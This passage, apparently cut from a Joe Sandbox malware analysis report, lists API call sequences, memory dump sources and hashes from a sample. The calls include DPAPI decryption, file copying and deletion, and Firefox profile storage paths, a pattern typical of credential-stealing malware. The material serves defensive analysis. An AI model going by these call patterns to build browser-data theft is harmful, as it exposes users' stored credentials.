                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 003640CD
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 003640DC
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003640E3
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00364113
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptHeapString$AllocateProcess
                                  • String ID:
                                  • API String ID: 3825993179-0
                                  • Opcode ID: 55220bf06f412f5f5b69d23f8a82cf4df34f5a323157ef861e7919f3217a7987
                                  • Instruction ID: d2c0966e62432ecd76534f1e8c76f5fbba0588c9d86e7775ff99dadf0ae39aed
                                  • Opcode Fuzzy Hash: 55220bf06f412f5f5b69d23f8a82cf4df34f5a323157ef861e7919f3217a7987
                                  • Instruction Fuzzy Hash: 05011AB0600205ABDB109FA5EC89BAABBADEF95311F108159BE0987240DA719984DBA4
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00349B3B
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00349B4A
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00349B61
                                  • LocalFree.KERNEL32 ref: 00349B70
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: 7f2f31ea750cc7d9240e420bec4ec2f860c4d9a2329726a1ee942293284aa86f
                                  • Instruction ID: 55fdec0f4c5fec839df60cf578b1912fe16c062f33737b5560757cb5959a6d3a
                                  • Opcode Fuzzy Hash: 7f2f31ea750cc7d9240e420bec4ec2f860c4d9a2329726a1ee942293284aa86f
                                  • Instruction Fuzzy Hash: 90F01D70350312ABE7311F65BC49F577BA8EF14B50F210155FA49EA2D0E7B09884DAA4
                                  APIs
                                  • CoCreateInstance.COMBASE(0036B110,00000000,00000001,0036B100,?), ref: 0035CB06
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0035CB46
                                  • lstrcpyn.KERNEL32(?,?,00000104), ref: 0035CBC9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                  • String ID:
                                  • API String ID: 1940255200-0
                                  • Opcode ID: 78c931a324821e549a2b749e0d17ed8aac7a67354d81161bcfa5bc75402fba71
                                  • Instruction ID: a35a521da9992a624b4878ba92bcdbf7fe0ee12e4303109ca1fec3ba2876d6a0
                                  • Opcode Fuzzy Hash: 78c931a324821e549a2b749e0d17ed8aac7a67354d81161bcfa5bc75402fba71
                                  • Instruction Fuzzy Hash: 3D316471A40315BFD711DB94CC96FAAB7B99B88B15F104184FA04EB2D0D7B0AE44CFA0
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00349B9F
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00349BB3
                                  • LocalFree.KERNEL32(?), ref: 00349BD7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: 3fd5f1e263a193a621daf4fad57ed6e5eced909bcfee4cb808f7284150372a86
                                  • Instruction ID: c17f67bea53e7f58e0a2fc525681c3d5860777c59a3412e309f31bb86970e417
                                  • Opcode Fuzzy Hash: 3fd5f1e263a193a621daf4fad57ed6e5eced909bcfee4cb808f7284150372a86
                                  • Instruction Fuzzy Hash: 40011275E41309ABD710DBA4EC45FBBB778EB44700F104555EA04AB280D774AD04CBE1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: y~?
                                  • API String ID: 0-2413047131
                                  • Opcode ID: 9738fe1ddf68d0aa327e5aa1f3ff28ddfa1f2c2b1923f4678d8b1e6274c69bb9
                                  • Instruction ID: 4be7ab7aed14a795bda4044251e1539eb832d479b99c32c8a90510b5f77b840e
                                  • Opcode Fuzzy Hash: 9738fe1ddf68d0aa327e5aa1f3ff28ddfa1f2c2b1923f4678d8b1e6274c69bb9
                                  • Instruction Fuzzy Hash: 766129F3A086009BF3046E29EC4577ABBD5EBC4720F1A863DEBC4D7784E53998058796
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 2o
                                  • API String ID: 0-2559669485
                                  • Opcode ID: 595f895e69ab5425baf6e9e066ca809d58eb0d909b3634ce35974e87f321c12e
                                  • Instruction ID: cd2992821a392c34a98f0f2ef0cfe4a975f3d71abd9b2d96bfcb3374a9be75ea
                                  • Opcode Fuzzy Hash: 595f895e69ab5425baf6e9e066ca809d58eb0d909b3634ce35974e87f321c12e
                                  • Instruction Fuzzy Hash: 4E6136F3A082104BE3146E3DDC8877ABBD5EF84720F1A463DDAD4C7784EA3518448782
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8f5982389cd97102c86e6217c8b31e4d7067364d68b9004057c551a02af0df29
                                  • Instruction ID: 1939190bf742dc1011ebf8f8b040e9858db5987a16276ebba9eff023800519b2
                                  • Opcode Fuzzy Hash: 8f5982389cd97102c86e6217c8b31e4d7067364d68b9004057c551a02af0df29
                                  • Instruction Fuzzy Hash: BDE1F7F350C210AFE304AE2DDC4567ABBDAEFD4320F168A3DE6C493744EA3558018697
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7a803992eb33b395ecce09d1d583c5c34f06d4476cb0a03acd0dc832935b4be2
                                  • Instruction ID: 3e6077dc2760a55e5c82911a203f0ff0ecd647fc78561160b279fd1bc6609dfd
                                  • Opcode Fuzzy Hash: 7a803992eb33b395ecce09d1d583c5c34f06d4476cb0a03acd0dc832935b4be2
                                  • Instruction Fuzzy Hash: A67129F3E092145BE3186E29EC4576AB7D5EB90320F1B853DEAC8E7380E9795C0487D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b1991fc22e088b72066c70f03faf21dc5b5b676d167bd3c19dded7b109a15a9a
                                  • Instruction ID: 96a797818b4c17f80c76cc280341c66870800594e7dec3f0a3bf9529412d751d
                                  • Opcode Fuzzy Hash: b1991fc22e088b72066c70f03faf21dc5b5b676d167bd3c19dded7b109a15a9a
                                  • Instruction Fuzzy Hash: 71512BF360C6049FE308AE2DED9577AB7D6EBD4320F16863DE78583784ED3914058646
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 36a95695485c68b62619cbc5bc5616c753f11a977c269e38e2f104ad55a0f47b
                                  • Instruction ID: 967ef2b4c770d320feb339fbf3b6facb95af005e836ac8e9be02dc2f2d0c4ab4
                                  • Opcode Fuzzy Hash: 36a95695485c68b62619cbc5bc5616c753f11a977c269e38e2f104ad55a0f47b
                                  • Instruction Fuzzy Hash: 56413BB3E052246BE700692DEC84767B78AD794770F1F8139EF8863388E87A6C0942D1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 77635076e65d4417c80afd0ac6c145f579de31e065b56a9eba8cde4f6752cb57
                                  • Instruction ID: b495ef2842b04f9a398f3557592cf7aa32f672e08a6a737e66ba2a728032401a
                                  • Opcode Fuzzy Hash: 77635076e65d4417c80afd0ac6c145f579de31e065b56a9eba8cde4f6752cb57
                                  • Instruction Fuzzy Hash: 8C41E1F650CA00DBDB50AE28FC8077EB7E5AFA5710F26892DD7C187314EA3954119793
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 00358636
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035866D
                                  • lstrcpy.KERNEL32(?,00000000), ref: 003586AA
                                  • StrStrA.SHLWAPI(?,00FADBC8), ref: 003586CF
                                  • lstrcpyn.KERNEL32(005793D0,?,00000000), ref: 003586EE
                                  • lstrlen.KERNEL32(?), ref: 00358701
                                  • wsprintfA.USER32 ref: 00358711
                                  • lstrcpy.KERNEL32(?,?), ref: 00358727
                                  • StrStrA.SHLWAPI(?,00FADE50), ref: 00358754
                                  • lstrcpy.KERNEL32(?,005793D0), ref: 003587B4
                                  • StrStrA.SHLWAPI(?,00FADEB0), ref: 003587E1
                                  • lstrcpyn.KERNEL32(005793D0,?,00000000), ref: 00358800
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                  • String ID: %s%s
                                  • API String ID: 2672039231-3252725368
                                  • Opcode ID: b88e11256a79d3a4c171c7c4e2c04f478f59f41ef6bd3ee3de3bda0c876f567f
                                  • Instruction ID: 4bb23dc5c974f0f2875fb0222473ad3d27ddcd1324b4ec939e745e139691dbca
                                  • Opcode Fuzzy Hash: b88e11256a79d3a4c171c7c4e2c04f478f59f41ef6bd3ee3de3bda0c876f567f
                                  • Instruction Fuzzy Hash: F8F14E71905114AFCB11DB64ED48AEAB7B9EF98300F148595F90DE7250DF30AE49EBA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00341F9F
                                  • lstrlen.KERNEL32(00FA8858), ref: 00341FAE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341FDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 00341FE3
                                  • lstrlen.KERNEL32(00371794), ref: 00341FEE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034200E
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034201A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00342042
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034204D
                                  • lstrlen.KERNEL32(00371794), ref: 00342058
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00342075
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00342081
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003420AC
                                  • lstrlen.KERNEL32(?), ref: 003420E4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00342104
                                  • lstrcat.KERNEL32(00000000,?), ref: 00342112
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00342139
                                  • lstrlen.KERNEL32(00371794), ref: 0034214B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034216B
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00342177
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034219D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003421A8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003421D4
                                  • lstrlen.KERNEL32(?), ref: 003421EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034220A
                                  • lstrcat.KERNEL32(00000000,?), ref: 00342218
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00342242
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034227F
                                  • lstrlen.KERNEL32(00FAC6B0), ref: 0034228D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003422B1
                                  • lstrcat.KERNEL32(00000000,00FAC6B0), ref: 003422B9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003422F7
                                  • lstrcat.KERNEL32(00000000), ref: 00342304
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034232D
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00342356
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00342382
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003423BF
                                  • DeleteFileA.KERNEL32(00000000), ref: 003423F7
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00342444
                                  • FindClose.KERNEL32(00000000), ref: 00342453
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                   Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                  • String ID:
                                  • API String ID: 2857443207-0
                                  • Opcode ID: b68d978af3199bd93de011edde1d67250be8d50715c4c3e766473f66e8307813
                                  • Instruction ID: 81f805eaa2d3c1c273fc5664a0828af72ad86f9c44433e4874eafb4d1eee2817
                                  • Opcode Fuzzy Hash: b68d978af3199bd93de011edde1d67250be8d50715c4c3e766473f66e8307813
                                  • Instruction Fuzzy Hash: 49E11A31A116169BCB22EF64ED89AAF77F9AF14300F854064F809BF211DB34ED55DBA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00356445
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00356480
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003564AA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003564E1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356506
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0035650E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356537
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                   Similarity
                                  • API ID: lstrcpy$FolderPathlstrcat
                                  • String ID: \..\
                                  • API String ID: 2938889746-4220915743
                                  • Opcode ID: 473dd85c6413c6b1b4ba84794064b1546fa0906419cc40fc56d7a1f0c0340905
                                  • Instruction ID: 019095adb9053766ecc3ad00fc11c603707f9b90c7ec8a79bb6fa6c1be677fa4
                                  • Opcode Fuzzy Hash: 473dd85c6413c6b1b4ba84794064b1546fa0906419cc40fc56d7a1f0c0340905
                                  • Instruction Fuzzy Hash: A8F16C709112069BCB23AF64DC4AEAF77F8AF44301F854568FC55AB261DB34EC59CBA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003543A3
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003543D6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003543FE
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00354409
                                  • lstrlen.KERNEL32(\storage\default\), ref: 00354414
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354431
                                  • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0035443D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354466
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00354471
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354498
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003544D7
                                  • lstrcat.KERNEL32(00000000,?), ref: 003544DF
                                  • lstrlen.KERNEL32(00371794), ref: 003544EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354507
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00354513
                                  • lstrlen.KERNEL32(.metadata-v2), ref: 0035451E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035453B
                                  • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00354547
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035456E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003545A0
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 003545A7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00354601
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035462A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00354653
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035467B
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003546AF
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
